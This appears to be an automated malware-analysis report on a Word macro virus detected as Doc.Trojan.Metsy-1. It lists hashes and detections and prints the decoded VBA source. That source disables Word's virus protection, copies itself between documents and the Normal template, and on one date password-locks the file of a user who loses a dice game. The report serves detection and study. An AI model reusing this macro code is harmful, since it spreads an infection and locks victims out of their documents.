Office (OLE) malware analysis — malicious · bec113ca868e9ae4

MALICIOUS

Office (OLE)

29.0 KB Created: 2001-01-03 09:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a6ffd5fa93abf18fcdecfce76ab09b33 SHA-1: 25cf1c190ee2591db0e2bb9b38ac6d58fdcfed58 SHA-256: bec113ca868e9ae486eaa20bebe5aa7c3c101eee149283eabb99e1da9615f66f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro presents a deceptive 'game' to the user, and if the user loses, it attempts to save the document with a password and potentially execute further malicious code. The ClamAV detection as 'Doc.Trojan.Metsy-1' further supports its malicious nature. The VBA macro language is identified as the primary execution method.

Heuristics 3

ClamAV: Doc.Trojan.Metsy-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Metsy-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2408 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2408 bytes
SHA-256: `4d72923a1a071aaf2a4704300c1d5b828f2c65f4774f532dc570131d1207a681`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_New() End Sub Private Sub Document_Open() If Day(Date) = 18 And Month(Date) = 9 Then MsgBox "Happy Birthday Jess! To celebrate, we're going to see how lucky you are " & Application.UserName & ". Click the OK button below to roll a number. If your number matches that of the dealer, you win!" X = Int((9 * Rnd) + 1) y = Int((9 * Rnd) + 1) If X = y Then MsgBox "You roll a " & X & " and the dealer rolls a " & y & ". You win!" Exit Sub Else MsgBox "You roll a " & X & " and the dealer rolls a " & y & ". I'm sorry, but you lost. Better luck next time!" For i = 1 To 14 RndNumber = Int((9 * Rnd) + 0) X = X & RndNumber Next i ActiveDocument.Words.First = "YOU LOSE! " cument.Password = ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ActiveDocument.Close End If End If Exit Sub End Sub Private Sub Document_Close() On Error GoTo Out Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines If nt > 55 And ad > 0 Then GoTo Out If nt < 55 Then Set host = NormalTemplate.VBProject.VBComponents.Item(1) ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat" host.codemodule.AddFromFile ("C:\System.dat") With host.codemodule For X = 1 To 4 .DeleteLines 1 Next X End With Kill ("C:\System.dat") End If If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1) NormalTemplate.VBProject.VBComponents(1).Export "C:\System.dat" host.codemodule.AddFromFile ("C:\System.dat") With host.codemodule For X = 1 To 4 .DeleteLines 1 Next X End With Kill ("C:\System.dat") End If Out: End Sub

SHA-256: 4d72923a1a071aaf2a4704300c1d5b828f2c65f4774f532dc570131d1207a681

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_New()

End Sub

Private Sub Document_Open()
If Day(Date) = 18 And Month(Date) = 9 Then
     MsgBox "Happy Birthday Jess! To celebrate, we're going to see how lucky you are " & Application.UserName & ". Click the OK button below to roll a number. If your number matches that of the dealer, you win!"
     X = Int((9 * Rnd) + 1)
     y = Int((9 * Rnd) + 1)
          If X = y Then
               MsgBox "You roll a " & X & " and the dealer rolls a " & y & ". You win!"
               Exit Sub
          Else
               MsgBox "You roll a " & X & " and the dealer rolls a " & y & ". I'm sorry, but you lost. Better luck next time!"
               For i = 1 To 14
                    RndNumber = Int((9 * Rnd) + 0)
                    X = X & RndNumber
               Next i
                    ActiveDocument.Words.First = "YOU LOSE! "
                    
                    
                    cument.Password =                     ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
                    ActiveDocument.Close
          End If
End If
Exit Sub
End Sub

Private Sub Document_Close()
On Error GoTo Out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 55 And ad > 0 Then GoTo Out
If nt < 55 Then
     Set host = NormalTemplate.VBProject.VBComponents.Item(1)
     ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For X = 1 To 4
     .DeleteLines 1
     Next X
     End With
     Kill ("C:\System.dat")
End If
If ad = 0 Then
     Set host = ActiveDocument.VBProject.VBComponents.Item(1)
     NormalTemplate.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For X = 1 To 4
     .DeleteLines 1
     Next X
     End With
     Kill ("C:\System.dat")
End If
Out:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.